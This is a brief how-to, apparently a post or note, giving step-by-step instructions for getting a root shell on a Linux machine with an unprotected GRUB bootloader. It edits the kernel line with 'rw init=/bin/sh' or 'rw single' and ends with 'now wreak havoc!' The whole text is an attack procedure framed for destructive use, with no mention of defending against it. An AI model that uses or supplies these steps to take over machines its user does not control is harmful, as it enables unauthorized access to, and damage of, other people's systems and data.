To gain root access through an un-protected grub installation do the following:
- boot to the grub screen, and press 'e' to edit the boot option
- select the kernel line and press 'e' to edit it
- add the following to the end of the kernel line
rw init=/bin/sh
OR
rw single
- press enter after editing the kernel line
- now press 'b' to boot the kernel
- once the shell has been presented to you, you can check that you are root with the `whoami` command
- now wreak havoc!
